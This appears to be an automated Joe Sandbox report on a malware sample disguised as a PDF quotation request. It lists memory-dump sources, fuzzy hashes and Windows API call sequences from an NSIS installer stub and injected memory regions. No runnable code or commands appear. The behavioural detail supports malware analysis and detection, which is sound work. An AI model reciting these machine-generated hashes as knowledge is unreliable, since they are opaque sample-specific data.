                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c41c43ebdf814e8100420ae2e7b70998f7f15d58fbe3fa6bf64f8c5925bd8f7e
                                                                                                                                  • Instruction ID: 70232fa517d7545664ff058306fbd8d175c4c9e4f96696c62c32d6bb693317c0
                                                                                                                                  • Opcode Fuzzy Hash: c41c43ebdf814e8100420ae2e7b70998f7f15d58fbe3fa6bf64f8c5925bd8f7e
                                                                                                                                  • Instruction Fuzzy Hash: A20169307406018FCB14DF2ED480D1AB7FAEF89354305856AE04ADB732EB30EC468B90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dbbf8f92d29ad17c0029c88e8f16bc2058d18174cdd4f56aba64ba353d39157c
                                                                                                                                  • Instruction ID: 68fe095f986a6d5ad96af43afb5a5395598a291e5d6105e5bba5138684c7702b
                                                                                                                                  • Opcode Fuzzy Hash: dbbf8f92d29ad17c0029c88e8f16bc2058d18174cdd4f56aba64ba353d39157c
                                                                                                                                  • Instruction Fuzzy Hash: 17019E38D15606CFCF00DFB4D8582EDFBB1FB8A311FA0A429C415A32A1DB399915CBA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 734400cb3ef12d2712b8db16187b44e18e8339528fd151ec7bf9416addd1fe3a
                                                                                                                                  • Instruction ID: 9f445b7e14ca69ec06d2be87f7cc3a10ab6bc95b80bccc46643db3ee8953da54
                                                                                                                                  • Opcode Fuzzy Hash: 734400cb3ef12d2712b8db16187b44e18e8339528fd151ec7bf9416addd1fe3a
                                                                                                                                  • Instruction Fuzzy Hash: BF01A232B043119FDB249B798854A3E77EBAFC4654715453ED80AC7320FE70CD018652
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  • Opcode Fuzzy Hash: 2351fe47019a5b11a23db5dc2e13f641ca3a34e402367fdcfd56cb2cf80ddef5
                                                                                                                                  • Instruction Fuzzy Hash: D2D05E3220C7828FC712CB30DC59484BF70AF17214B5551DAD097CB9A3D2A69815CB01
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2fcc0640ba890939126b6ba923b26b147f7aa52320413d436246c84ce7233eb6
                                                                                                                                  • Instruction ID: d58cec79119479bfe26a72f026d62cd6daccb08e2e933134b8a6e6eef443e883
                                                                                                                                  • Opcode Fuzzy Hash: 2fcc0640ba890939126b6ba923b26b147f7aa52320413d436246c84ce7233eb6
                                                                                                                                  • Instruction Fuzzy Hash: 86D05E2210E6A00FCB16922C7828C99AF794DC712138947EBE058CB0A696990A4E839A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 896e2012b56e7b9fc57de5be9b8c2e2e0a14fb2e8f38c8f838a3ba4a52439dd9
                                                                                                                                  • Instruction ID: 650d7060257076313b386fa9ae38e20cd892ac58f24446166070d3541e2cbad7
                                                                                                                                  • Opcode Fuzzy Hash: 896e2012b56e7b9fc57de5be9b8c2e2e0a14fb2e8f38c8f838a3ba4a52439dd9
                                                                                                                                  • Instruction Fuzzy Hash: EAD02B3054C3444FC507F730BC508953B6F6FC0204F14866590064BABEDE38494BD7B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2b7cf7946a8003a5724048b62873003091a6afe1bff14b5e28280d5c10d3e163
                                                                                                                                  • Instruction ID: 50b93425a3865ffc62b5cdef46a1d7a7ffcd2dd30739fd2b17cb925fff3bb338
                                                                                                                                  • Opcode Fuzzy Hash: 2b7cf7946a8003a5724048b62873003091a6afe1bff14b5e28280d5c10d3e163
                                                                                                                                  • Instruction Fuzzy Hash: 6ED0673AB400189FCB049F98EC808DDFBB6FB98221B048117E915A3265C6319965DB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8ee12a7a5cb50d9a397c470629f785e714fcf568160a8544f10a60e232edd2a1
                                                                                                                                  • Instruction ID: 0dd9cf047b768fde947e31699e2a847f9879126d0ea178679eae43d90f57e9d5
                                                                                                                                  • Opcode Fuzzy Hash: 8ee12a7a5cb50d9a397c470629f785e714fcf568160a8544f10a60e232edd2a1
                                                                                                                                  • Instruction Fuzzy Hash: FBD0127081520DDFC744DFA4D805BEAB7BCEB47312F4051A9A40D63250DB725D50D799
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c5cc9651a4357427ccb7e732d405a9d3345443b64e8de3adb464ac09c5c0f62e
                                                                                                                                  • Instruction ID: b9bed5e953103ed948a98b23dd03791d53e0304e18567cdcf36eccfac71a8105
                                                                                                                                  • Opcode Fuzzy Hash: c5cc9651a4357427ccb7e732d405a9d3345443b64e8de3adb464ac09c5c0f62e
                                                                                                                                  • Instruction Fuzzy Hash: 42C01232245510174E28A21CB48099E965DCEC53217108A36B005E21188E68994FC195
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24a5e287c15d60767750f4083ee67641d8cb137bff0f6fc921e75abfa12417bc
                                                                                                                                  • Instruction ID: 8148ca72984eeaf36ec2b147f2b8fce594d6d76f43e5c32673445dc7e4be5e93
                                                                                                                                  • Opcode Fuzzy Hash: 24a5e287c15d60767750f4083ee67641d8cb137bff0f6fc921e75abfa12417bc
                                                                                                                                  • Instruction Fuzzy Hash: 75C08C74011E098BE6042F50BC0CB79B7B8B707323FC82D10E00D02871CBB89424CA44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a1d691301729d9d824ea694733f30f80a99c99cba67a9233cc3b8ec5c11428b4
                                                                                                                                  • Instruction ID: 5e399f95e139b3778fb93e54e2458700bdbd46e54e45a50ae13464853f97816b
                                                                                                                                  • Opcode Fuzzy Hash: a1d691301729d9d824ea694733f30f80a99c99cba67a9233cc3b8ec5c11428b4
                                                                                                                                  • Instruction Fuzzy Hash: 99C012300543084EC549EB65FD45965776EBB802047548520A0060757EEFB8594A8AD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f94995a20ccfa0998406b59b9960dd4e662d5366434739e7b2911b43061c8016
                                                                                                                                  • Instruction ID: 91bcb2bc807fdfd25c3f7423668ca710465af34ad974dcfb2f6c51a5aed4f6ff
                                                                                                                                  • Opcode Fuzzy Hash: f94995a20ccfa0998406b59b9960dd4e662d5366434739e7b2911b43061c8016
                                                                                                                                  • Instruction Fuzzy Hash: DAC08C302A82048FE6009A1DC984A2173ACEF85B04F0028E0F108CB635CB22FC048604
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4cffcc435bc626dd6f89ee78686460ee9227fabe39c7c323abf21b46cd6cabd9
                                                                                                                                  • Instruction ID: 002ed668cbcbffe1de30e7fade01dc3e673ce3dec4e9cf8ab8388658aea88062
                                                                                                                                  • Opcode Fuzzy Hash: 4cffcc435bc626dd6f89ee78686460ee9227fabe39c7c323abf21b46cd6cabd9
                                                                                                                                  • Instruction Fuzzy Hash: 57A022B0B02A008FCF08CF30C22808833A0FF0030030200AFB00FC30A0CA30A008CB02
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5965fc96c5253a84d7572ff7f3b2394a1a00c2ae1e37959577d805e014636274
                                                                                                                                  • Instruction ID: b2b87759b1612eb36ff0347e2001e0bdd41346efa6db2734f629ce2a197ba042
                                                                                                                                  • Opcode Fuzzy Hash: 5965fc96c5253a84d7572ff7f3b2394a1a00c2ae1e37959577d805e014636274
                                                                                                                                  • Instruction Fuzzy Hash: 5EA0223C300002C3C308EB28E000C0FF3832FE0A08B00C02C0008030E08820CC028023
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                                  • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                  • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                                  • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                                  • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                                  • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                                  • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                  • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                  • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                                  • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                                  • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                                  • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                  • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                  • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                  • API String ID: 3586999533-3972089011
                                                                                                                                  • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                  • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                  • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                  • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                  • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                  • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                  • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                  • API String ID: 0-1947560563
                                                                                                                                  • Opcode ID: ba3e3f675b04ece668eb0630bdd165852bb40c5002c63e96119f9453e5b5c41c
                                                                                                                                  • Instruction ID: d166174a8608a8f2c2a53ace1dd7a40e00e89eb9ea3ae3930bfbb2a9194d4525
                                                                                                                                  • Opcode Fuzzy Hash: ba3e3f675b04ece668eb0630bdd165852bb40c5002c63e96119f9453e5b5c41c
                                                                                                                                  • Instruction Fuzzy Hash: 5632A074E01218CFDB68CF69C994B9DBBB2BF89310F1080A9D909A7361DB759E85CF50
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,75923420,00441800,0043F000), ref: 0040586F
                                                                                                                                  • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75923420,00441800,0043F000), ref: 004058B7
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058DA
                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058E0
                                                                                                                                  • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75923420,00441800,0043F000), ref: 004058F0
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2035342205-1173974218
                                                                                                                                  • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                  • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                  • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                  • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "$0o@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                                                                                                  • API String ID: 0-455001714
                                                                                                                                  • Opcode ID: 8a6219432b3b93f2a9232669869fdbb05b549a69255168ee01ce505f94e0c530
                                                                                                                                  • Instruction ID: 86126ff53ec0aeb97fb7bdb7b08782ac1e52c393e2bf02db471b7fef9554b9a6
                                                                                                                                  • Opcode Fuzzy Hash: 8a6219432b3b93f2a9232669869fdbb05b549a69255168ee01ce505f94e0c530
                                                                                                                                  • Instruction Fuzzy Hash: A902AEB4E002188FDB58CF69D994BDDBBB2BF89300F1081A9D908A7365DB359E85CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .5uq
                                                                                                                                  • API String ID: 0-910421107
                                                                                                                                  • Opcode ID: 251b4266069ba574f255fb5074ce61cf02d81f30dbd1670efcc235d1accd9efe
                                                                                                                                  • Instruction ID: a899647c2ffd87b619fc10aaf70eadff0b5083f080de0afbbda7be81c42a439e
                                                                                                                                  • Opcode Fuzzy Hash: 251b4266069ba574f255fb5074ce61cf02d81f30dbd1670efcc235d1accd9efe
                                                                                                                                  • Instruction Fuzzy Hash: F062AA74A01228CFDB64DF65C980BDDBBB2BF89310F5085EAE409A7265DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5330f81973d9ca2ffd4b558910739298f8a716e6622d3060da24e544bf40a32f
